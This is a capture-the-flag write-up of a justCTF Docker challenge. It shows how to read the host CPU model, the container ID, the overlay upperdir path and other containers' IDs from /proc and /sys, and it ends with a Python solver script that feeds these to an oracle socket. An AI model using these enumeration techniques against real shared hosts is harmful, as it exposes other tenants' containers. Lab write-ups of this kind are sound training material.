In this challenge, we connect to a server which spawns us a Docker container. On the filesystem, there is an oracle.sock with which we have to communicate and we have to find answers to its questions.
➜ pwn_docker git:(master) nc docker-ams32.nc.jctf.pro 1337
Access to this challenge is rate limited via hashcash!
Please use the following command to solve the Proof of Work:
hashcash -mb26 srstylyd
Your PoW: 1:26:210131:srstylyd::j48cYbN3LycmgT9f:000000004U6N/
1:26:210131:srstylyd::j48cYbN3LycmgT9f:000000004U6N/
[*] Spawning a task manager for you...
[*] Spawning a Docker container with a shell for ya, with a timeout of 10m :)
[*] Your task is to communicate with /oracle.sock and find out the answers for its questions!
[*] You can use this command for that:
[*] socat - UNIX-CONNECT:/oracle.sock
[*] PS: If the socket dies for some reason (you cannot connect to it) just exit and get into another instance
groups: cannot find name for group ID 1000
I have no name!@694ff9e7ac41:/$ ls -la /
ls -la /
total 56
drwxr-xr-x 1 root root 4096 Jan 31 18:37 .
drwxr-xr-x 1 root root 4096 Jan 31 18:37 ..
-rwxr-xr-x 1 root root 0 Jan 31 18:37 .dockerenv
lrwxrwxrwx 1 root root 7 Jan 19 01:01 bin -> usr/bin
drwxr-xr-x 2 root root 4096 Apr 15 2020 boot
drwxr-xr-x 5 root root 360 Jan 31 18:37 dev
drwxr-xr-x 1 root root 4096 Jan 31 18:37 etc
drwxr-xr-x 2 root root 4096 Apr 15 2020 home
lrwxrwxrwx 1 root root 7 Jan 19 01:01 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Jan 19 01:01 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Jan 19 01:01 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Jan 19 01:01 libx32 -> usr/libx32
drwxr-xr-x 2 root root 4096 Jan 19 01:01 media
drwxr-xr-x 2 root root 4096 Jan 19 01:01 mnt
drwxr-xr-x 2 root root 4096 Jan 19 01:01 opt
srwxrwxrwx 1 root root 0 Jan 31 18:37 oracle.sock
dr-xr-xr-x 153 root root 0 Jan 31 18:37 proc
drwx------ 2 root root 4096 Jan 19 01:04 root
drwxr-xr-x 1 root root 4096 Jan 21 03:38 run
lrwxrwxrwx 1 root root 8 Jan 19 01:01 sbin -> usr/sbin
drwxr-xr-x 2 root root 4096 Jan 19 01:01 srv
dr-xr-xr-x 13 root root 0 Jan 31 18:37 sys
drwxrwxrwt 1 root root 4096 Jan 30 20:11 tmp
drwxr-xr-x 1 root root 4096 Jan 19 01:01 usr
drwxr-xr-x 1 root root 4096 Jan 19 01:04 var
I have no name!@694ff9e7ac41:/$ mount | grep sock
mount | grep sock
/dev/vda1 on /oracle.sock type ext4 (rw,relatime)
We can do this, as the challenge suggests, by using socat - UNIX-CONNECT:/oracle.sock.
An another solution could be writing some python3 code as there is Python 3 interpreter in the container.
I have no name!@694ff9e7ac41:/$ socat - UNIX-CONNECT:/oracle.sock
socat - UNIX-CONNECT:/oracle.sock
Welcome to the
______ _____ _
| _ \ _ | | |
| | | | |/' | ___| | _____ _ __
| | | | /| |/ __| |/ / _ \ '__|
| |/ /\ |_/ / (__| < __/ |
|___/ \___/ \___|_|\_\___|_|
oracle!
I will give you the flag if you can tell me certain information about the host (:
ps: brute forcing is not the way to go.
Let's go!
[Level 1] What is the full *cpu model* model used?
In the first level, we are asked about the cpu model used. We can find this in /proc/cpuinfo:
I have no name!@8b6ad5efc924:/$ cat /proc/cpuinfo | grep -i model
cat /proc/cpuinfo | grep -i model
model : 85
model name : Intel(R) Xeon(R) Gold 6140 CPU @ 2.30GHz
model : 85
model name : Intel(R) Xeon(R) Gold 6140 CPU @ 2.30GHz
model : 85
model name : Intel(R) Xeon(R) Gold 6140 CPU @ 2.30GHz
model : 85
model name : Intel(R) Xeon(R) Gold 6140 CPU @ 2.30GHz
In the second level, we are asked about our full container id. This can be found as part of the /proc/self/cgroup file:
I have no name!@8b6ad5efc924:/$ cat /proc/self/cgroup
cat /proc/self/cgroup
12:cpuset:/docker/8b6ad5efc924c8bd3a09f8b75d0b67c157542e1a0c85db3b5f1ff271e9039259
11:hugetlb:/docker/8b6ad5efc924c8bd3a09f8b75d0b67c157542e1a0c85db3b5f1ff271e9039259
10:blkio:/docker/8b6ad5efc924c8bd3a09f8b75d0b67c157542e1a0c85db3b5f1ff271e9039259
9:net_cls,net_prio:/docker/8b6ad5efc924c8bd3a09f8b75d0b67c157542e1a0c85db3b5f1ff271e9039259
8:devices:/docker/8b6ad5efc924c8bd3a09f8b75d0b67c157542e1a0c85db3b5f1ff271e9039259
7:pids:/docker/8b6ad5efc924c8bd3a09f8b75d0b67c157542e1a0c85db3b5f1ff271e9039259
6:perf_event:/docker/8b6ad5efc924c8bd3a09f8b75d0b67c157542e1a0c85db3b5f1ff271e9039259
5:freezer:/docker/8b6ad5efc924c8bd3a09f8b75d0b67c157542e1a0c85db3b5f1ff271e9039259
4:rdma:/
3:cpu,cpuacct:/docker/8b6ad5efc924c8bd3a09f8b75d0b67c157542e1a0c85db3b5f1ff271e9039259
2:memory:/docker/8b6ad5efc924c8bd3a09f8b75d0b67c157542e1a0c85db3b5f1ff271e9039259
1:name=systemd:/docker/8b6ad5efc924c8bd3a09f8b75d0b67c157542e1a0c85db3b5f1ff271e9039259
0::/system.slice/containerd.service
I have no name!@8b6ad5efc924:/$ socat - UNIX-CONNECT:/oracle.sock
socat - UNIX-CONNECT:/oracle.sock
Welcome to the
______ _____ _
| _ \ _ | | |
| | | | |/' | ___| | _____ _ __
| | | | /| |/ __| |/ / _ \ '__|
| |/ /\ |_/ / (__| < __/ |
|___/ \___/ \___|_|\_\___|_|
oracle!
I will give you the flag if you can tell me certain information about the host (:
ps: brute forcing is not the way to go.
Let's go!
[Level 1] What is the full *cpu model* model used?
Intel(R) Xeon(R) Gold 6140 CPU @ 2.30GHz
Intel(R) Xeon(R) Gold 6140 CPU @ 2.30GHz
That was easy :)
[Level 2] What is your *container id*?
8b6ad5efc924c8bd3a09f8b75d0b67c157542e1a0c85db3b5f1ff271e9039259
8b6ad5efc924c8bd3a09f8b75d0b67c157542e1a0c85db3b5f1ff271e9039259
[Level 3] Let me check if you truly given me your container id. I created a /secret file on your machine. What is the hidden secret?
The third level creates us a /secret
import sys
import socket
import time
import subprocess
import re
CONTAINER_ID_REGEX = '[a-z0-9]{64}'
with open('/proc/self/cgroup') as f:
my_container_id = f.read().splitlines()[0].split('docker/')[1]
print("MY CONTAINER ID: %s" % my_container_id)
cpuinfo_lines = open('/proc/cpuinfo').read().splitlines()
cpumodel_line = next(line for line in cpuinfo_lines if 'model name' in line)
cpumodel = cpumodel_line.split(': ')[1].strip()
def get_container_ids():
data = subprocess.check_output('ls -l /sys/kernel/slab/*/cgroup/', shell=True).decode().splitlines()
cgroups = set(line.split('(')[-1][:-1].split(':')[1] for line in data if '(' in line and line[-1] == ')')
return cgroups
def filter_container_ids(iterable):
return [
i for i in iterable if re.match(CONTAINER_ID_REGEX, i)
]
all_container_ids = filter_container_ids(get_container_ids())
def attempt(target_id):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect('/oracle.sock')
print(sock.recv(864))
sock.sendall((cpumodel + '\n').encode())
print(sock.recv(len(b'That was easy :)\n[Level 2] What is your *container id*?\n')))
sock.sendall((my_container_id + '\n').encode())
print(sock.recv(500))
time.sleep(1)
with open('/secret') as f:
secret = f.read()
print("READ SECRET: %s" % secret)
sock.sendall((secret + '\n').encode())
print(sock.recv(500))
with open('/proc/self/mounts') as f:
mounts = f.read().splitlines()
upperdir = [i for i in mounts if 'upperdir=' in i][0]
upperdir = upperdir[upperdir.index('upperdir=')+len('upperdir='):]
upperdir = upperdir.split(',')[0]
path = upperdir+'/secret'
print("PATH IS: %s" % path)
sock.sendall((path + '\n').encode())
print(sock.recv(500))
sock.sendall((target_id + '\n').encode())
print(sock.recv(500))
sock.sendall((target_id + '\n').encode())
flag = sock.recv(500)
if b'justCTF' in flag:
print(flag)
sys.exit(0)
for container_id in all_container_ids:
attempt(container_id)